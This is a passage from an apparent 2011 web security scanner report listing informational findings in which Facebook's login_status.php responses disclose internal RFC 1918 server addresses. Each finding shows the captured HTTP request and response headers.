Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2a9934924&origin=http%3A%2F%2Fwww.widgetbox.com%2Ffe718eb0&relation=parent&transport=postmessage&frame=f120e2df28
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.249.35
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:20 GMT
Content-Length: 0


25.16. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=148695881829460&app_id=148695881829460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbe5121a%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent.parent%26transport%3Dflash&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16c5a3d2%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent%26transport%3Dflash%26frame%3Dfb4088484%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c32afb2c%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent%26transport%3Dflash%26frame%3Dfb4088484&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f0f6849c%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent%26transport%3Dflash%26frame%3Dfb4088484&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3336457e4%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent%26transport%3Dflash%26frame%3Dfb4088484&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1f0f6849c&origin=http%3A%2F%2Frealestate.msn.com%2Ff2850c939c&relation=parent&transport=flash&frame=fb4088484
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.214.54
X-Cnection: close
Date: Tue, 26 Apr 2011 18:45:35 GMT
Content-Length: 0


25.17. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=143021229053479&app_id=143021229053479&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12485f34%26origin%3Dhttp%253A%252F%252Ftheinvestedlife.msn.com%252Fffe09d674%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23ec2acfc%26origin%3Dhttp%253A%252F%252Ftheinvestedlife.msn.com%252Fffe09d674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28e896348%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df185141974%26origin%3Dhttp%253A%252F%252Ftheinvestedlife.msn.com%252Fffe09d674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28e896348&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df466d3404%26origin%3Dhttp%253A%252F%252Ftheinvestedlife.msn.com%252Fffe09d674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28e896348&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27dc9d89c%26origin%3Dhttp%253A%252F%252Ftheinvestedlife.msn.com%252Fffe09d674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df28e896348&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://theinvestedlife.msn.com/?source=msnmoney
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f466d3404&origin=http%3A%2F%2Ftheinvestedlife.msn.com%2Fffe09d674&relation=parent&transport=postmessage&frame=f28e896348
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.247.35
X-Cnection: close
Date: Tue, 26 Apr 2011 18:39:32 GMT
Content-Length: 0


25.18. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ece6f8d%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff3f02b3898%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df318c8a2c4%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff3f02b3898%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d13ac6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d4472ed4%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff3f02b3898%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d13ac6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10bc69088%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff3f02b3898%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d13ac6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23c5f5eb8%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff3f02b3898%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d13ac6c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f10bc69088&origin=http%3A%2F%2Fwww.widgetbox.com%2Ff3f02b3898&relation=parent&transport=postmessage&frame=f14d13ac6c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.240.58
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:21 GMT
Content-Length: 0


25.19. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.113
X-Cnection: close
Date: Tue, 26 Apr 2011 21:07:17 GMT
Content-Length: 1092

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"moxieinsight.com","channel"
...[SNIP]...

25.20. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.229.45
X-Cnection: close
Date: Tue, 26 Apr 2011 18:38:54 GMT
Content-Length: 0


25.21. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31039d62c%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df259c37dc8%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb6deec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c23b2b6c%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb6deec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df14736f1dc%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb6deec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df724e8a98%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb6deec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f14736f1dc&origin=http%3A%2F%2Fwww.widgetbox.com%2Ff19861d338&relation=parent&transport=postmessage&frame=f1fb6deec
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.242.60
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:38 GMT
Content-Length: 0


25.22. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=148695881829460&app_id=148695881829460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13b4950b4%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff8d498134%26relation%3Dparent.parent%26transport%3Dflash&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df346f0afb%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff8d498134%26relation%3Dparent%26transport%3Dflash%26frame%3Df348c0329%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1267183f8%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff8d498134%26relation%3Dparent%26transport%3Dflash%26frame%3Df348c0329&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19e34d71%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff8d498134%26relation%3Dparent%26transport%3Dflash%26frame%3Df348c0329&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c96f593c%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff8d498134%26relation%3Dparent%26transport%3Dflash%26frame%3Df348c0329&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f19e34d71&origin=http%3A%2F%2Frealestate.msn.com%2Ff8d498134&relation=parent&transport=flash&frame=f348c0329
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.3.41
X-Cnection: close
Date: Tue, 26 Apr 2011 18:39:22 GMT
Content-Length: 0


25.23. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b89ad4%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e58e5b08%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bf0b770c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cac57664%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bf0b770c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df287608f38%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bf0b770c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a9ff349c%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bf0b770c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f287608f38&origin=http%3A%2F%2Fwww.widgetbox.com%2Ff19861d338&relation=parent&transport=postmessage&frame=f3bf0b770c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.235.63
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:44 GMT
Content-Length: 0


25.24. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e5b1675c%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1909dac5%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ba8db0e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df329caa724%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ba8db0e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2bd7cc954%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ba8db0e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df340ab523%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ba8db0e&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2bd7cc954&origin=http%3A%2F%2Fwww.widgetbox.com%2Ff19861d338&relation=parent&transport=postmessage&frame=f3ba8db0e
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.52
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:19 GMT
Content-Length: 0


25.25. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=3686c957ae60aac15538bbb525943089&app_id=3686c957ae60aac15538bbb525943089&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fbd0408%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2547a3868%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcc1a34b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c04427%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcc1a34b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df50c6d9e4%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcc1a34b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aadde8%26origin%3Dhttp%253A%252F%252Fwww.widgetbox.com%252Ff19861d338%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcc1a34b4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f50c6d9e4&origin=http%3A%2F%2Fwww.widgetbox.com%2Ff19861d338&relation=parent&transport=postmessage&frame=fcc1a34b4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.6.39
X-Cnection: close
Date: Tue, 26 Apr 2011 21:46:33 GMT
Content-Length: 0


25.26. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

